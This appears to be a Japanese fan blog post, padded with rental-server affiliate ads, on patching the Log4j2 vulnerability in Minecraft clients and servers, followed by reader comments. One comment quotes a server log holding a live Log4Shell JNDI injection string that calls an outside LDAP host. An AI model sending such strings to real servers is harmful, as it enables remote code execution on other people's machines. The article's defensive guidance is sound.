【マイクラ】Log4j2問題に関する対処方法のまとめ【バニラ/プラグイン/Forge対応】
当記事にはアフィリエイト広告が含まれています。
2023年10月1日より施行された景品表示法の指定告示(通称:ステマ規制)によって、広告を掲載しているサイトやメディア、SNS内に、読者が認識できるような表記が必須となりました。
当サイトにおいても景品表示法に則り、冒頭に表記するようにしていますので、ご理解の上、ご覧いただけますと幸いです。
当記事にはアフィリエイト広告が含まれています。
2023年10月1日より施行された景品表示法の指定告示(通称:ステマ規制)によって、広告を掲載しているサイトやメディア、SNS内に、読者が認識できるような表記が必須となりました。
当サイトにおいても景品表示法に則り、冒頭に表記するようにしていますので、ご理解の上、ご覧いただけますと幸いです。
揚げたてのポテトこんにちわ、揚げたてのポテトです。
ポテコちゃんどうもー!助手のポテ子ちゃんです!
揚げたてのポテト先日、Log4j2の脆弱性に関する問題が話題になりましたね。
ポテコちゃんえ!?そうなの?初耳なんだけど…
揚げたてのポテトマイクラにも大きく関わる問題なので、確認しながら見ていきましょう。今回はよく分からない人のために対応方法をまとめてみました。
当記事では、Log4j2の脆弱性に関する問題でマインクラフトでの対応方法をまとめた記事になります。
目次
Log4j2問題って何?
ポテコちゃんところでLog4j2問題ってどんなの?
マインクラフトでは、「Log4j2」というログを出力するプログラムが使われています。
今回、このLog4j2にて重大な脆弱性が発見されたため、大きく話題になりました。
マインクラフトでは、この脆弱性を悪用することで、任意のリモートコードを実行できてしまう例が報告されています。
要するに任意のコードを実行させると最悪パソコン操作もできてしまうという重大な問題です。
そのため、マインクラフトではこの問題に対応するべく、クライアント側やサーバー側で対処する必要があります。
公式クライアントの対処方法
公式クライアント(公式ランチャー)では、2021年12月10日以降よりLog4j2問題に対するパッチ(修正プログラム)が更新されました。
このパッチは、公式ランチャーを起動すれば自動的にパッチが適用されるのでクライアント側の対処方法はこれで完了です。
そのため、以前と同じく好きなバージョンで遊ぶことができるようになりました。
あわせて読みたい
【マイクラ】新ランチャーへのアップグレード方法【新ランチャー】
どうもこんにちわ、揚げたてのポテトです。 2021年11月2日よりマイクラランチャーのアップグレードが表示されるようになりました。本日はマイクラランチャーのアップグ…
Forgeクライアントの対応方法
次にMODで遊ぶ際に主にForgeを導入してプレイすると思います。
その時に公式クライアントではなく、Forgeクライアントになるので上記の対策が適用されません。
そのため、Forgeをダウンロードするときにパッチが適用されたForgeをダウンロードする必要があります。
揚げたてのポテト以下にバージョンごとにまとめたので参考にしてください。
- 1.18.1以降:最初からパッチ適用
- 1.18:バージョン38.0.17以降よりパッチ適用
- 1.17.1:バージョン37.1.1以降よりパッチ適用
- 1.16.5:バージョン36.2.20以降よりパッチ適用
- 1.15.2:バージョン31.2.57以降よりパッチ適用
- 1.14.4:バージョン28.2.25以降よりパッチ適用
- 1.13.2:バージョン25.0.222以降よりパッチ適用
- 1.12.2:バージョン2-14.23.5.2857以降よりパッチ適用
- 1.11.2以下のバージョンは現時点ではパッチはありません。
サーバー側の対処方法
マイクラサーバーでは、バニラサーバーやプラグインサーバー、MODサーバーによってそれぞれ対処方法が異なりますので、注意してください。
バニラサーバー(公式サーバー)の場合
プラグインサーバー(SpigotMC/PaperMC)の場合
MODサーバー(Forge)の場合
プロキシサーバー(Waterfall/Velocity/VanillaCord)の場合
\当サイトがおすすめしたいレンタルサーバー/
 ConoHa for GAME 詳しくみる | マイクラサーバーが自動構築ですぐ遊べる(MOD対応) 初回利用は800円クーポンが貰える 1ヶ月以上利用する方は長期割引パスの料金がおトク 4GBプラン:月額2,408円/8GBプラン:月額4,828円 キャンペーン中:今なら1500円クーポンをプレゼント!(5月10日まで) |
 Xserver VPS 詳しくみる | マイクラサーバーが自動構築ですぐ遊べる(MOD対応) 大手他社より3~4倍のサーバー性能&高速回線を提供 マイクラサーバーの設定が初心者でも分かりやすい 4GBプラン:月額2,200円/8GBプラン:月額4,400円 キャンペーン中:12ヶ月なら月額3,239円(5月7日まで)※8GBプラン |
\コスパ最強のレンタルサーバー/
\当サイトがおすすめしたいレンタルサーバー/
ConoHa for GAME 詳しくみる | マイクラサーバーが自動構築ですぐ遊べる(MOD対応) 初回利用は800円クーポンが貰える 1ヶ月以上利用する方は長期割引パスの料金がおトク 4GBプラン:月額2,408円/8GBプラン:月額4,828円 キャンペーン中:今なら1500円クーポンをプレゼント!(5月10日まで) |
Xserver VPS 詳しくみる | マイクラサーバーが自動構築ですぐ遊べる(MOD対応) 大手他社より3~4倍のサーバー性能&高速回線を提供 マイクラサーバーの設定が初心者でも分かりやすい 4GBプラン:月額2,200円/8GBプラン:月額4,400円 キャンペーン中:12ヶ月なら月額3,239円(5月7日まで)※8GBプラン |
\コスパ最強のレンタルサーバー/
レンタルサーバーはこんな人におすすめ!
「パソコンの性能(スペック)が足りない」
「ポート開放が上手くできない」
「難しくてよく分からない」
揚げたてのポテト当サイトでは、上記のレンタルサーバーを徹底解説しているので初めての方でも分かりやすいと好評です!
脆弱性の確認方法
きちんと対策できているか不安の方は以下のコードをマイクラチャットで実行して確認することができます。
${date:YYYY}
上記のコマンドを「/(スラッシュ)」入れずにそのまま送信してください。
この時に「2022」(現在の西暦)と表示されなければ対策できています。
最後に
取り急ぎまとめた記事なので説明不足な部分もあるかと思いますが、改めて追記や修正を行いたいと思います。
Log4j2の脆弱性は大変危険な問題です。
サーバー運営してる人やマルチプレイで良く遊ぶ人は必ず対処を行いましょう!
揚げたてのポテト最後まで読んでいただきありがとうございました。
次回の記事でお会いしましょう!
\当サイトがおすすめしたいレンタルサーバー/
ConoHa for GAME 詳しくみる | マイクラサーバーが自動構築ですぐ遊べる(MOD対応) 初回利用は800円クーポンが貰える 1ヶ月以上利用する方は長期割引パスの料金がおトク 4GBプラン:月額2,408円/8GBプラン:月額4,828円 キャンペーン中:今なら1500円クーポンをプレゼント!(5月10日まで) |
Xserver VPS 詳しくみる | マイクラサーバーが自動構築ですぐ遊べる(MOD対応) 大手他社より3~4倍のサーバー性能&高速回線を提供 マイクラサーバーの設定が初心者でも分かりやすい 4GBプラン:月額2,200円/8GBプラン:月額4,400円 キャンペーン中:12ヶ月なら月額3,239円(5月7日まで)※8GBプラン |
\コスパ最強のレンタルサーバー/
\当サイトがおすすめしたいレンタルサーバー/
ConoHa for GAME 詳しくみる | マイクラサーバーが自動構築ですぐ遊べる(MOD対応) 初回利用は800円クーポンが貰える 1ヶ月以上利用する方は長期割引パスの料金がおトク 4GBプラン:月額2,408円/8GBプラン:月額4,828円 キャンペーン中:今なら1500円クーポンをプレゼント!(5月10日まで) |
Xserver VPS 詳しくみる | マイクラサーバーが自動構築ですぐ遊べる(MOD対応) 大手他社より3~4倍のサーバー性能&高速回線を提供 マイクラサーバーの設定が初心者でも分かりやすい 4GBプラン:月額2,200円/8GBプラン:月額4,400円 キャンペーン中:12ヶ月なら月額3,239円(5月7日まで)※8GBプラン |
\コスパ最強のレンタルサーバー/
この記事が気に入ったら
フォローしてね!
更新の止まった古いプラグインって使ってても大丈夫ですかね?
PaperMCver1.16未満は
パッチが適用されていないそうですが
PaperMCでLog4j2の
対策をする方法は無いのですか?
1.18.1-39.0.0でConohaでForgeサーバーをたててます、1日立てっぱなしにしてたら [User Authenticator #2/INFO]: UUID of player FermatSleep is xxxxxx
[01:13:20] [Server thread/INFO]: Using new advancement loading for net.minecraft.server.PlayerAdvancements@3xxxxx
[01:13:20] [Server thread/INFO]: FermatSleep[/xxxxx] logged in with entity id 3512 at (xxxxxx)
[01:13:20] [Server thread/INFO]: FermatSleep joined the game
[01:13:21] [Server thread/INFO]: ${jndi:ldap://185.233.105.120:1389/a}
[01:13:22] [Server thread/INFO]: FermatSleep lost connection: Disconnected
[01:13:22] [Server thread/INFO]: FermatSleep left the game
みたいなログが残ってました。log4j?かなにかをされたと思うのですが具体的に何をされたか、何かされていた場合どう対処すればいいかわかりませんか?( ; ; )
現在1.16.5のmod入りサーバーで遊んでいます。
ランチャーとforgeを最新のものに更新し、公式のJVM引数もコピペ済みなのですが、アップデートなど行われていないMODを入れるのは避けるべきでしょうか?
mohistはもうパッチきましたか?